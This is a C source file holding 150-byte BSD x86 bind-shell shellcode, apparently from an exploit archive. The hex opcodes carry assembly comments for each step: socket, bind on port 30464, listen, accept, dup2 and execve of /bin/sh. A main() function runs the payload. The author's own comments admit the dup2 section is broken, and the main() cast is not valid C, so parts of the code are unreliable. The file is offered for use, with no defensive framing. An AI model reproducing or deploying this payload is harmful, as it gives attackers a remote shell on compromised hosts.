/* BSD SHELLCODE 150 byte shellcode that binds /bin/sh on port 30464 By R00T-dude note: this is a port of my linux shellcode, and is pretty crappy, could be highly optimized + the dup2() part of the shellcode needs to be fixed, for this reason stderr isn't dup'ed. */ char shellcode[] = /* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */ "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xd2" // xorl %edx,%edx "\xb0\x61" // movb $0x61,%al "\x51" // pushl %ecx "\xb1\x06" // movb $0x6,%cl "\x51" // pushl %ecx "\xb1\x01" // movb $0x1,%cl "\x51" // pushl %ecx "\xb1\x02" // movb $0x2,%cl "\x51" // pushl %ecx "\x8d\x0c\x24" // leal (%esp),%ecx "\x51" // pushl %ecx "\xcd\x80" // int $0x80 /* it binds on port 30464 */ /* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */ /* turns out that the bsd struct sockaddr_in differs from the linux one, arg !!!!! */ "\xb1\x02" // movb $0x2,%cl "\x31\xc9" // xorl %ecx,%ecx "\x51" // pushl %ecx "\x51" // pushl %ecx "\x51" // pushl %ecx /* port = 0x77, change if needed */ "\x80\xc1\x77" // addb $0x77,%cl "\x66\x51" // pushw %cx "\xb5\x02" // movb $0x2,%ch "\x66\x51" // pushw %cx "\x8d\x0c\x24" // leal (%esp),%ecx "\xb2\x10" // movb $0x10,%dl "\x52" // pushl %edx "\x51" // pushl %ecx "\x50" // pushl %eax "\x8d\x0c\x24" // leal (%esp),%ecx "\x51" // pushl %ecx "\x89\xc2" // movl %eax,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x68" // movb $0x68,%al "\xcd\x80" // int $0x80 /* listen(fd, 1)*/ "\xb3\x01" // movb $0x1,%bl "\x53" // pushl %ebx "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\x51" // pushl %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x6a" // movb $0x6a,%al "\xcd\x80" // int $0x80 /* cli = accept(fd, 0,0) */ "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x50" // pushl %eax "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\x51" // pushl %ecx "\x31\xc9" // xorl %ecx,%ecx "\xb0\x1e" // movb $0x1e,%al "\xcd\x80" // int $0x80 /* this dup2() code is screwed and needs to be fixed !!! */ /* dup2(cli, 0) <-- doesn't work !!! */ "\x89\xc3" // movl %eax,%ebx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x5a" // movb $0x5a,%al "\xcd\x80" // int $0x80 /* dup2(cli, 1) */ "\x41" // inc %ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x5a" // movb $0x5a,%al "\xcd\x80" // int $0x80 /* dup2(cli, 2) */ "\x41" // inc %ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x5a" // movb $0x5a,%al "\xcd\x80" // int $0x80 /* execve("//bin/sh", ["//bin/sh", NULL], NULL) */ /* this is eSDee's bsd /bin/sh code */ "\x31\xdb" // xorl %ebx,%ebx "\x53" // pushl %ebx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x54" // pushl %esp "\x53" // pushl %ebx "\x50" // pushl %eax "\xb0\x3b" // mov $0x3b,%al "\xcd\x80" // int $0x80 /* exit(stack_shit) */ "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // mobv $0x1,%al "\xcd\x80"; // int $0x80 int main(void) { void (*funct)(); (long) funct = &shellcode; funct(); }